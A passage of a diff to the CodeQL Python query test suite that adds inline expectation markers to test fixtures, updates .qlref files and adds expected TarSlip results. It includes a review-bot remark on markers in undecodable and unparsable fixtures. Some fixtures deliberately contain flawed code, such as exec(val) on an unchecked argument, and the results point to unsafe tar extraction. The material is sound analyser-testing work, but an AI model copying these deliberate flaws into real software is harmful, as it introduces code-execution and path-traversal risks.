b/python/ql/test/3/query-tests/Classes/undefined-attribute/UndefinedClassAttribute.qlref index 7ac0a3b18b77..f0e8fb722784 100644 --- a/python/ql/test/3/query-tests/Classes/undefined-attribute/UndefinedClassAttribute.qlref +++ b/python/ql/test/3/query-tests/Classes/undefined-attribute/UndefinedClassAttribute.qlref @@ -1 +1,2 @@ -Classes/UndefinedClassAttribute.ql +query: Classes/UndefinedClassAttribute.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/3/query-tests/Expressions/Arguments/WrongNameForArgumentInCall.qlref b/python/ql/test/3/query-tests/Expressions/Arguments/WrongNameForArgumentInCall.qlref index 3599f204f55e..c6b6ca3d30fa 100644 --- a/python/ql/test/3/query-tests/Expressions/Arguments/WrongNameForArgumentInCall.qlref +++ b/python/ql/test/3/query-tests/Expressions/Arguments/WrongNameForArgumentInCall.qlref 
@@ -1 +1,2 @@ -Expressions/WrongNameForArgumentInCall.ql \ No newline at end of file +query: Expressions/WrongNameForArgumentInCall.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/3/query-tests/Expressions/Arguments/WrongNumberArgumentsInCall.qlref b/python/ql/test/3/query-tests/Expressions/Arguments/WrongNumberArgumentsInCall.qlref index 1bffe8f1cad4..68dc510d5c6e 100644 --- a/python/ql/test/3/query-tests/Expressions/Arguments/WrongNumberArgumentsInCall.qlref +++ b/python/ql/test/3/query-tests/Expressions/Arguments/WrongNumberArgumentsInCall.qlref @@ -1 +1,2 @@ -Expressions/WrongNumberArgumentsInCall.ql \ No newline at end of file +query: Expressions/WrongNumberArgumentsInCall.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/3/query-tests/Expressions/Arguments/wrong_arguments.py b/python/ql/test/3/query-tests/Expressions/Arguments/wrong_arguments.py index 729177ea0b43..1242af144b61 100644 --- a/python/ql/test/3/query-tests/Expressions/Arguments/wrong_arguments.py +++ b/python/ql/test/3/query-tests/Expressions/Arguments/wrong_arguments.py @@ -9,8 +9,8 @@ def f(a, *varargs, kw1, kw2="has-default"): f(1, 2, kw1=1, kw2=2) #Not OK -f(1, 2, 3, kw1=1, kw3=3) -f(1, 2, 3, kw3=3) +f(1, 2, 3, kw1=1, kw3=3) # $ Alert[py/call/wrong-named-argument] +f(1, 2, 3, kw3=3) # $ Alert[py/call/wrong-named-argument] #ODASA-5897 @@ -21,4 +21,4 @@ def ok(): return analyze_member_access(msg, original=original, chk=chk) def bad(): - return analyze_member_access(msg, original, chk=chk) + return analyze_member_access(msg, original, chk=chk) # $ Alert[py/call/wrong-arguments] diff --git a/python/ql/test/3/query-tests/Expressions/Formatting/WrongNumberArgumentsForFormat.qlref b/python/ql/test/3/query-tests/Expressions/Formatting/WrongNumberArgumentsForFormat.qlref index 0d127e1b618b..744334a6aeb1 100644 --- a/python/ql/test/3/query-tests/Expressions/Formatting/WrongNumberArgumentsForFormat.qlref 
+++ b/python/ql/test/3/query-tests/Expressions/Formatting/WrongNumberArgumentsForFormat.qlref
@@ -1 +1,2 @@
-Expressions/WrongNumberArgumentsForFormat.ql
\ No newline at end of file
+query: Expressions/WrongNumberArgumentsForFormat.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/3/query-tests/Expressions/TruncatedDivision/TruncatedDivision.qlref b/python/ql/test/3/query-tests/Expressions/TruncatedDivision/TruncatedDivision.qlref
index fa2c2cbf006c..17d539c32260 100644
--- a/python/ql/test/3/query-tests/Expressions/TruncatedDivision/TruncatedDivision.qlref
+++ b/python/ql/test/3/query-tests/Expressions/TruncatedDivision/TruncatedDivision.qlref
@@ -1 +1,2 @@
-Expressions/TruncatedDivision.ql
+query: Expressions/TruncatedDivision.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/3/query-tests/Expressions/UseofApply/UseofApply.qlref b/python/ql/test/3/query-tests/Expressions/UseofApply/UseofApply.qlref
index abf684e3918a..4add79acdb3c 100644
--- a/python/ql/test/3/query-tests/Expressions/UseofApply/UseofApply.qlref
+++ b/python/ql/test/3/query-tests/Expressions/UseofApply/UseofApply.qlref
@@ -1 +1,2 @@
-Expressions/UseofApply.ql
+query: Expressions/UseofApply.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/3/query-tests/Imports/encoding_error/EncodingError.qlref b/python/ql/test/3/query-tests/Imports/encoding_error/EncodingError.qlref
index a7e91769ded1..bc78d28db329 100644
--- a/python/ql/test/3/query-tests/Imports/encoding_error/EncodingError.qlref
+++ b/python/ql/test/3/query-tests/Imports/encoding_error/EncodingError.qlref
@@ -1 +1,2 @@
-Imports/EncodingError.ql
+query: Imports/EncodingError.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/3/query-tests/Imports/syntax_error/EncodingError.qlref b/python/ql/test/3/query-tests/Imports/syntax_error/EncodingError.qlref
index e742356f8658..bc78d28db329 100644
--- a/python/ql/test/3/query-tests/Imports/syntax_error/EncodingError.qlref +++ b/python/ql/test/3/query-tests/Imports/syntax_error/EncodingError.qlref @@ -1 +1,2 @@ -Imports/EncodingError.ql \ No newline at end of file +query: Imports/EncodingError.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/3/query-tests/Imports/syntax_error/SyntaxError.qlref b/python/ql/test/3/query-tests/Imports/syntax_error/SyntaxError.qlref index c143a01fe8b3..5d0698be3de5 100644 --- a/python/ql/test/3/query-tests/Imports/syntax_error/SyntaxError.qlref +++ b/python/ql/test/3/query-tests/Imports/syntax_error/SyntaxError.qlref @@ -1 +1,2 @@ -Imports/SyntaxError.ql \ No newline at end of file +query: Imports/SyntaxError.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/3/query-tests/Imports/syntax_error/bad_encoding.py b/python/ql/test/3/query-tests/Imports/syntax_error/bad_encoding.py index 9c61b1e1b114..5e3308df0f57 100644 --- a/python/ql/test/3/query-tests/Imports/syntax_error/bad_encoding.py +++ b/python/ql/test/3/query-tests/Imports/syntax_error/bad_encoding.py @@ -8,5 +8,5 @@ # encoding:shift-jis def f(): - print "Python ‚ÌŠJ”­‚ÍA1990 ”N‚²‚ë‚©‚çŠJŽn‚³‚ê‚Ä‚¢‚Ü‚·" + print "Python ‚ÌŠJ”­‚ÍA1990 ”N‚²‚ë‚©‚çŠJŽn‚³‚ê‚Ä‚¢‚Ü‚·" # $ Alert[py/encoding-error] """ diff --git a/python/ql/test/3/query-tests/Imports/syntax_error/nonsense.py b/python/ql/test/3/query-tests/Imports/syntax_error/nonsense.py index 66cdd526fbab..e0819afbc5ee 100644 --- a/python/ql/test/3/query-tests/Imports/syntax_error/nonsense.py +++ b/python/ql/test/3/query-tests/Imports/syntax_error/nonsense.py @@ -1,4 +1,4 @@ - `Twas brillig, and the slithy toves + `Twas brillig, and the slithy toves # $ Alert[py/syntax-error] Did gyre and gimble in the wabe: All mimsy were the borogoves, And the mome raths outgrabe. 
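Review bot: The `# $ Alert[py/encoding-error]` marker in bad_encoding.py is appended to a line of a file that is deliberately undecodable, and the `# $ Alert[py/syntax-error]` marker in nonsense.py sits in a file that deliberately fails to parse, so the hunks do not show that either marker is ever extracted as a comment. The trailing `"""` context line in bad_encoding.py also suggests the edited line may lie inside a string literal rather than in code. If the markers are not seen, InlineExpectationsTestQuery would presumably report these alerts as unexpected in the regenerated .expected files, so those are worth checking before merge. If comments cannot be read from such files, a `.qlref` holding only `query: Imports/SyntaxError.ql` (the form the Summary tests in this patch use) would keep the plain .expected comparison for this directory.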
diff --git a/python/ql/test/3/query-tests/Statements/general/ExecUsed.qlref b/python/ql/test/3/query-tests/Statements/general/ExecUsed.qlref index ccff89d6815f..286996305ed1 100644 --- a/python/ql/test/3/query-tests/Statements/general/ExecUsed.qlref +++ b/python/ql/test/3/query-tests/Statements/general/ExecUsed.qlref @@ -1 +1,2 @@ -Statements/ExecUsed.ql \ No newline at end of file +query: Statements/ExecUsed.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/3/query-tests/Statements/general/TopLevelPrint.qlref b/python/ql/test/3/query-tests/Statements/general/TopLevelPrint.qlref index 8271065261d0..e91717901f3d 100644 --- a/python/ql/test/3/query-tests/Statements/general/TopLevelPrint.qlref +++ b/python/ql/test/3/query-tests/Statements/general/TopLevelPrint.qlref @@ -1 +1,2 @@ -Statements/TopLevelPrint.ql \ No newline at end of file +query: Statements/TopLevelPrint.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/3/query-tests/Statements/general/module.py b/python/ql/test/3/query-tests/Statements/general/module.py index 0b1f4d26546b..af34eedf0dc3 100644 --- a/python/ql/test/3/query-tests/Statements/general/module.py +++ b/python/ql/test/3/query-tests/Statements/general/module.py @@ -1,2 +1,2 @@ #Top level prints in modules are bad -print ("Side effect on import") \ No newline at end of file +print ("Side effect on import") # $ Alert[py/print-during-import] \ No newline at end of file diff --git a/python/ql/test/3/query-tests/Statements/general/statements_test.py b/python/ql/test/3/query-tests/Statements/general/statements_test.py index 2baee458c04c..a4414a40f80c 100644 --- a/python/ql/test/3/query-tests/Statements/general/statements_test.py +++ b/python/ql/test/3/query-tests/Statements/general/statements_test.py @@ -2,7 +2,7 @@ def exec_used(val): - exec(val) + exec(val) # $ Alert[py/use-of-exec] #Top level print import module 
diff --git a/python/ql/test/3/query-tests/Statements/iter/IterableStringOrSequence.qlref b/python/ql/test/3/query-tests/Statements/iter/IterableStringOrSequence.qlref index e8f1ce1b79ef..c24806ccf305 100644 --- a/python/ql/test/3/query-tests/Statements/iter/IterableStringOrSequence.qlref +++ b/python/ql/test/3/query-tests/Statements/iter/IterableStringOrSequence.qlref @@ -1 +1,2 @@ -Statements/IterableStringOrSequence.ql \ No newline at end of file +query: Statements/IterableStringOrSequence.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/3/query-tests/Statements/iter/NonIteratorInForLoop.qlref b/python/ql/test/3/query-tests/Statements/iter/NonIteratorInForLoop.qlref index fb09cace29a8..b7697d64d8fa 100644 --- a/python/ql/test/3/query-tests/Statements/iter/NonIteratorInForLoop.qlref +++ b/python/ql/test/3/query-tests/Statements/iter/NonIteratorInForLoop.qlref @@ -1 +1,2 @@ -Statements/NonIteratorInForLoop.ql \ No newline at end of file +query: Statements/NonIteratorInForLoop.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/3/query-tests/Statements/iter/async_iterator.py b/python/ql/test/3/query-tests/Statements/iter/async_iterator.py index fdde931eace9..76972058a02a 100644 --- a/python/ql/test/3/query-tests/Statements/iter/async_iterator.py +++ b/python/ql/test/3/query-tests/Statements/iter/async_iterator.py @@ -23,5 +23,5 @@ async def good(): yield x async def bad(): - async for x in MissingAiter(): + async for x in MissingAiter(): # $ Alert[py/non-iterable-in-for-loop] yield x diff --git a/python/ql/test/3/query-tests/Statements/iter/statements_test.py b/python/ql/test/3/query-tests/Statements/iter/statements_test.py index 33b3f4aae5c5..daf811f3f83d 100644 --- a/python/ql/test/3/query-tests/Statements/iter/statements_test.py +++ b/python/ql/test/3/query-tests/Statements/iter/statements_test.py 
@@ -18,7 +18,7 @@ def f(x): s = u"Hello World" else: s = [ u'Hello', u'World'] - for thing in s: + for thing in s: # $ Alert[py/iteration-string-and-sequence] print (thing) @@ -31,7 +31,7 @@ class Color(Enum): def colors(): for color in Color: print(color) - for color in 1: + for color in 1: # $ Alert[py/non-iterable-in-for-loop] print(color) colors() diff --git a/python/ql/test/3/query-tests/Statements/unreachable/UnreachableCode.qlref b/python/ql/test/3/query-tests/Statements/unreachable/UnreachableCode.qlref index 5b7891f0026a..b95a67d24949 100644 --- a/python/ql/test/3/query-tests/Statements/unreachable/UnreachableCode.qlref +++ b/python/ql/test/3/query-tests/Statements/unreachable/UnreachableCode.qlref @@ -1 +1,2 @@ -Statements/UnreachableCode.ql +query: Statements/UnreachableCode.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/3/query-tests/Statements/unreachable_suppressed/UnreachableCode.qlref b/python/ql/test/3/query-tests/Statements/unreachable_suppressed/UnreachableCode.qlref index 5b7891f0026a..b95a67d24949 100644 --- a/python/ql/test/3/query-tests/Statements/unreachable_suppressed/UnreachableCode.qlref +++ b/python/ql/test/3/query-tests/Statements/unreachable_suppressed/UnreachableCode.qlref @@ -1 +1,2 @@ -Statements/UnreachableCode.ql +query: Statements/UnreachableCode.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/3/query-tests/Summary/LinesOfCode.qlref b/python/ql/test/3/query-tests/Summary/LinesOfCode.qlref index b60eb7917224..d22b10044239 100644 --- a/python/ql/test/3/query-tests/Summary/LinesOfCode.qlref +++ b/python/ql/test/3/query-tests/Summary/LinesOfCode.qlref @@ -1 +1 @@ -Summary/LinesOfCode.ql +query: Summary/LinesOfCode.ql diff --git a/python/ql/test/3/query-tests/Summary/LinesOfUserCode.qlref b/python/ql/test/3/query-tests/Summary/LinesOfUserCode.qlref index baaa947e6afa..99a6d1324943 100644 --- a/python/ql/test/3/query-tests/Summary/LinesOfUserCode.qlref 
+++ b/python/ql/test/3/query-tests/Summary/LinesOfUserCode.qlref @@ -1 +1 @@ -Summary/LinesOfUserCode.ql +query: Summary/LinesOfUserCode.ql diff --git a/python/ql/test/3/query-tests/Variables/undefined/UndefinedExport.py b/python/ql/test/3/query-tests/Variables/undefined/UndefinedExport.py index fc1a03f6e1c9..84a717c03143 100644 --- a/python/ql/test/3/query-tests/Variables/undefined/UndefinedExport.py +++ b/python/ql/test/3/query-tests/Variables/undefined/UndefinedExport.py @@ -1,6 +1,6 @@ -__all__ = [ "x", "y", "z", "module", "w" ] +__all__ = [ "x", "y", "z", "module", "w" ] # $ Alert[py/undefined-export] x = 1 if 0: diff --git a/python/ql/test/3/query-tests/Variables/undefined/UndefinedExport.qlref b/python/ql/test/3/query-tests/Variables/undefined/UndefinedExport.qlref index 3e5d31e47488..d964148077e5 100644 --- a/python/ql/test/3/query-tests/Variables/undefined/UndefinedExport.qlref +++ b/python/ql/test/3/query-tests/Variables/undefined/UndefinedExport.qlref @@ -1 +1,2 @@ -Variables/UndefinedExport.ql +query: Variables/UndefinedExport.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/3/query-tests/Variables/undefined/UninitializedLocal.qlref b/python/ql/test/3/query-tests/Variables/undefined/UninitializedLocal.qlref index f2d0e603554a..90233ce61888 100644 --- a/python/ql/test/3/query-tests/Variables/undefined/UninitializedLocal.qlref +++ b/python/ql/test/3/query-tests/Variables/undefined/UninitializedLocal.qlref @@ -1 +1,2 @@ -Variables/UninitializedLocal.ql +query: Variables/UninitializedLocal.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/3/query-tests/Variables/undefined/enum_convert.py b/python/ql/test/3/query-tests/Variables/undefined/enum_convert.py index 58979d0b4c9c..db6b89b8f7f4 100644 --- a/python/ql/test/3/query-tests/Variables/undefined/enum_convert.py +++ b/python/ql/test/3/query-tests/Variables/undefined/enum_convert.py 
@@ -5,4 +5,4 @@ __name__, lambda C: C.isupper() and C.startswith('AF_')) -__all__ = [ "Maybe", "Maybe_not" ] +__all__ = [ "Maybe", "Maybe_not" ] # $ Alert[py/undefined-export] diff --git a/python/ql/test/3/query-tests/Variables/undefined/package/__init__.py b/python/ql/test/3/query-tests/Variables/undefined/package/__init__.py index 85f1f2ac24f4..d0f80d5e8909 100644 --- a/python/ql/test/3/query-tests/Variables/undefined/package/__init__.py +++ b/python/ql/test/3/query-tests/Variables/undefined/package/__init__.py @@ -1 +1 @@ -__all__ = [ "module", "not_exists" ] \ No newline at end of file +__all__ = [ "module", "not_exists" ] # $ Alert[py/undefined-export] \ No newline at end of file diff --git a/python/ql/test/experimental/library-tests/CallGraph-implicit-init/InlineCallGraphTest.qlref b/python/ql/test/experimental/library-tests/CallGraph-implicit-init/InlineCallGraphTest.qlref index 25117a4582bd..e7b837c89003 100644 --- a/python/ql/test/experimental/library-tests/CallGraph-implicit-init/InlineCallGraphTest.qlref +++ b/python/ql/test/experimental/library-tests/CallGraph-implicit-init/InlineCallGraphTest.qlref @@ -1 +1 @@ -../CallGraph/InlineCallGraphTest.ql +query: ../CallGraph/InlineCallGraphTest.ql diff --git a/python/ql/test/experimental/library-tests/CallGraph-imports/InlineCallGraphTest.qlref b/python/ql/test/experimental/library-tests/CallGraph-imports/InlineCallGraphTest.qlref index 25117a4582bd..e7b837c89003 100644 --- a/python/ql/test/experimental/library-tests/CallGraph-imports/InlineCallGraphTest.qlref +++ b/python/ql/test/experimental/library-tests/CallGraph-imports/InlineCallGraphTest.qlref @@ -1 +1 @@ -../CallGraph/InlineCallGraphTest.ql +query: ../CallGraph/InlineCallGraphTest.ql diff --git a/python/ql/test/experimental/library-tests/CallGraph-type-annotations/InlineCallGraphTest.qlref b/python/ql/test/experimental/library-tests/CallGraph-type-annotations/InlineCallGraphTest.qlref index 25117a4582bd..e7b837c89003 100644 
--- a/python/ql/test/experimental/library-tests/CallGraph-type-annotations/InlineCallGraphTest.qlref +++ b/python/ql/test/experimental/library-tests/CallGraph-type-annotations/InlineCallGraphTest.qlref @@ -1 +1 @@ -../CallGraph/InlineCallGraphTest.ql +query: ../CallGraph/InlineCallGraphTest.ql diff --git a/python/ql/test/experimental/library-tests/FindSubclass/Find.qlref b/python/ql/test/experimental/library-tests/FindSubclass/Find.qlref index f8bd638be1ab..59bdb1462def 100644 --- a/python/ql/test/experimental/library-tests/FindSubclass/Find.qlref +++ b/python/ql/test/experimental/library-tests/FindSubclass/Find.qlref @@ -1 +1 @@ -meta/ClassHierarchy/Find.ql +query: meta/ClassHierarchy/Find.ql diff --git a/python/ql/test/experimental/query-tests/Classes/Naming/NamingConventionsClasses.py b/python/ql/test/experimental/query-tests/Classes/Naming/NamingConventionsClasses.py index c07bdb57234a..46633a009f72 100644 --- a/python/ql/test/experimental/query-tests/Classes/Naming/NamingConventionsClasses.py +++ b/python/ql/test/experimental/query-tests/Classes/Naming/NamingConventionsClasses.py @@ -1,5 +1,5 @@ # BAD, do not start class or interface name with lowercase letter -class badName: +class badName: # $ Alert def hello(self): print("hello") diff --git a/python/ql/test/experimental/query-tests/Classes/Naming/NamingConventionsClasses.qlref b/python/ql/test/experimental/query-tests/Classes/Naming/NamingConventionsClasses.qlref index 7ed945d782c4..b5b73c19bf81 100644 --- a/python/ql/test/experimental/query-tests/Classes/Naming/NamingConventionsClasses.qlref +++ b/python/ql/test/experimental/query-tests/Classes/Naming/NamingConventionsClasses.qlref @@ -1 +1,2 @@ -experimental/Classes/NamingConventionsClasses.ql \ No newline at end of file +query: experimental/Classes/NamingConventionsClasses.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/python/ql/test/experimental/query-tests/Functions/general/NamingConventionsFunctions.py b/python/ql/test/experimental/query-tests/Functions/general/NamingConventionsFunctions.py index fb3e89ab8e92..5923ce5919f3 100644 --- a/python/ql/test/experimental/query-tests/Functions/general/NamingConventionsFunctions.py +++ b/python/ql/test/experimental/query-tests/Functions/general/NamingConventionsFunctions.py @@ -1,7 +1,7 @@ class Test: # BAD, do not start function name with uppercase letter - def HelloWorld(self): + def HelloWorld(self): # $ Alert print("hello world") # GOOD, function name starts with lowercase letter diff --git a/python/ql/test/experimental/query-tests/Functions/general/NamingConventionsFunctions.qlref b/python/ql/test/experimental/query-tests/Functions/general/NamingConventionsFunctions.qlref index 0204694de0a3..21d3e5fe1358 100644 --- a/python/ql/test/experimental/query-tests/Functions/general/NamingConventionsFunctions.qlref +++ b/python/ql/test/experimental/query-tests/Functions/general/NamingConventionsFunctions.qlref @@ -1 +1,2 @@ -experimental/Functions/NamingConventionsFunctions.ql \ No newline at end of file +query: experimental/Functions/NamingConventionsFunctions.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/TarSlip.expected b/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/TarSlip.expected index 6de2b27bfa76..6cceacd031f6 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/TarSlip.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/TarSlip.expected 
@@ -1,3 +1,33 @@ +#select +| TarSlipImprov.py:22:35:22:40 | ControlFlowNode for result | TarSlipImprov.py:15:7:15:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:22:35:22:40 | ControlFlowNode for result | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:15:7:15:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:22:35:22:40 | ControlFlowNode for result | ControlFlowNode for result | +| TarSlipImprov.py:39:49:39:68 | ControlFlowNode for members_filter1() | TarSlipImprov.py:38:7:38:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:39:49:39:68 | ControlFlowNode for members_filter1() | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:38:7:38:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:39:49:39:68 | ControlFlowNode for members_filter1() | ControlFlowNode for members_filter1() | +| TarSlipImprov.py:47:21:47:25 | ControlFlowNode for entry | TarSlipImprov.py:43:6:43:38 | ControlFlowNode for Attribute() | TarSlipImprov.py:47:21:47:25 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:43:6:43:38 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:47:21:47:25 | ControlFlowNode for entry | ControlFlowNode for entry | +| TarSlipImprov.py:58:21:58:25 | ControlFlowNode for entry | TarSlipImprov.py:54:6:54:38 | ControlFlowNode for Attribute() | TarSlipImprov.py:58:21:58:25 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. 
| TarSlipImprov.py:54:6:54:38 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:58:21:58:25 | ControlFlowNode for entry | ControlFlowNode for entry | +| TarSlipImprov.py:91:5:91:7 | ControlFlowNode for tar | TarSlipImprov.py:88:6:88:43 | ControlFlowNode for Attribute() | TarSlipImprov.py:91:5:91:7 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:88:6:88:43 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:91:5:91:7 | ControlFlowNode for tar | ControlFlowNode for tar | +| TarSlipImprov.py:115:9:115:11 | ControlFlowNode for tar | TarSlipImprov.py:111:7:111:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:115:9:115:11 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:111:7:111:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:115:9:115:11 | ControlFlowNode for tar | ControlFlowNode for tar | +| TarSlipImprov.py:125:36:125:40 | ControlFlowNode for entry | TarSlipImprov.py:123:6:123:29 | ControlFlowNode for Attribute() | TarSlipImprov.py:125:36:125:40 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:123:6:123:29 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:125:36:125:40 | ControlFlowNode for entry | ControlFlowNode for entry | +| TarSlipImprov.py:130:5:130:7 | ControlFlowNode for tar | TarSlipImprov.py:129:6:129:26 | ControlFlowNode for Attribute() | TarSlipImprov.py:130:5:130:7 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. 
| TarSlipImprov.py:129:6:129:26 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:130:5:130:7 | ControlFlowNode for tar | ControlFlowNode for tar | +| TarSlipImprov.py:134:1:134:3 | ControlFlowNode for tar | TarSlipImprov.py:133:7:133:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:134:1:134:3 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:133:7:133:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:134:1:134:3 | ControlFlowNode for tar | ControlFlowNode for tar | +| TarSlipImprov.py:143:36:143:40 | ControlFlowNode for entry | TarSlipImprov.py:141:6:141:29 | ControlFlowNode for Attribute() | TarSlipImprov.py:143:36:143:40 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:141:6:141:29 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:143:36:143:40 | ControlFlowNode for entry | ControlFlowNode for entry | +| TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | TarSlipImprov.py:151:22:151:49 | ControlFlowNode for Attribute() | TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:151:22:151:49 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | ControlFlowNode for tarc | +| TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | TarSlipImprov.py:159:26:159:51 | ControlFlowNode for Attribute() | TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | Extraction of tarfile from $@ to a potentially untrusted source $@. 
| TarSlipImprov.py:159:26:159:51 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | ControlFlowNode for tarc | +| TarSlipImprov.py:178:36:178:40 | ControlFlowNode for entry | TarSlipImprov.py:176:6:176:31 | ControlFlowNode for Attribute() | TarSlipImprov.py:178:36:178:40 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:176:6:176:31 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:178:36:178:40 | ControlFlowNode for entry | ControlFlowNode for entry | +| TarSlipImprov.py:184:21:184:25 | ControlFlowNode for entry | TarSlipImprov.py:182:6:182:31 | ControlFlowNode for Attribute() | TarSlipImprov.py:184:21:184:25 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:182:6:182:31 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:184:21:184:25 | ControlFlowNode for entry | ControlFlowNode for entry | +| TarSlipImprov.py:189:1:189:3 | ControlFlowNode for tar | TarSlipImprov.py:188:7:188:27 | ControlFlowNode for Attribute() | TarSlipImprov.py:189:1:189:3 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:188:7:188:27 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:189:1:189:3 | ControlFlowNode for tar | ControlFlowNode for tar | +| TarSlipImprov.py:194:49:194:51 | ControlFlowNode for tar | TarSlipImprov.py:193:6:193:31 | ControlFlowNode for Attribute() | TarSlipImprov.py:194:49:194:51 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. 
| TarSlipImprov.py:193:6:193:31 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:194:49:194:51 | ControlFlowNode for tar | ControlFlowNode for tar | +| TarSlipImprov.py:211:5:211:7 | ControlFlowNode for tar | TarSlipImprov.py:210:6:210:43 | ControlFlowNode for Attribute() | TarSlipImprov.py:211:5:211:7 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:210:6:210:43 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:211:5:211:7 | ControlFlowNode for tar | ControlFlowNode for tar | +| TarSlipImprov.py:236:44:236:50 | ControlFlowNode for members | TarSlipImprov.py:231:6:231:38 | ControlFlowNode for Attribute() | TarSlipImprov.py:236:44:236:50 | ControlFlowNode for members | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:231:6:231:38 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:236:44:236:50 | ControlFlowNode for members | ControlFlowNode for members | +| TarSlipImprov.py:254:1:254:31 | ControlFlowNode for Attribute() | TarSlipImprov.py:254:1:254:31 | ControlFlowNode for Attribute() | TarSlipImprov.py:254:1:254:31 | ControlFlowNode for Attribute() | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:254:1:254:31 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:254:1:254:31 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | +| TarSlipImprov.py:261:25:261:29 | ControlFlowNode for entry | TarSlipImprov.py:258:6:258:26 | ControlFlowNode for Attribute() | TarSlipImprov.py:261:25:261:29 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. 
